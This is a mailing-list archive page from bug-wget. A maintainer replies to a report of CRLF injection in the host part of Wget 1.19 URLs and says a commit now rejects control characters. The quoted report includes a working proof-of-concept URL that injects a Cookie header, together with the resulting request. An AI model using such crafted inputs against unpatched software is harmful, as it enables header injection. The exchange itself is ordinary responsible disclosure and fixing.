bug-wget
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Bug-wget] Vulnerability Report - CRLF Injection in Wget Host Part

From: Tim Ruehsen
Subject: Re: [Bug-wget] Vulnerability Report - CRLF Injection in Wget Host Part
Date: Mon, 06 Mar 2017 10:17:25 +0100
User-agent: KMail/5.2.3 (Linux/4.9.0-2-amd64; KDE/5.28.0; x86_64; ; ) 
On Monday, March 6, 2017 3:42:24 AM CET Orange Tsai wrote:
> Hi
> 
> I just found that there is a CRLF Injection in the latest version of Wget
> 1.19.
> 
> Wget uses urlencode to encode CRLF in PATH part but doesn't use in HOST
> port. So an attacker can inject arbitrary header in the request.
> 
> 
> For example:
> 
> # This will fail
> $ wget 'http://127.0.0.1/%0d%0Cookie: hi'
> 
> GET /%0d%0Cookie:%20hi HTTP/1.1
> User-Agent: Wget/1.19 (linux-gnu)
> Accept: */*
> Accept-Encoding: identity
> Host: 127.0.0.1
> Connection: Keep-Alive
> 
> 
> # This will work
> $ wget 'http://127.0.0.1%0d%0aCookie%3a hi%0a/'
> 
> GET / HTTP/1.1
> User-Agent: Wget/1.19 (linux-gnu)
> Accept: */*
> Accept-Encoding: identity
> Host: [127.0.0.1
> *cookie: hi*
> ]
> Connection: Keep-Alive
> 
> 
> Wish you aware this, thanks for your reading :)

Thanks, just pushed a commit, not allowing control chars in host part.

Regards, Tim

Attachment: signature.asc
Description: This is a digitally signed message part.

reply via email to
[Prev in Thread] Current Thread [Next in Thread]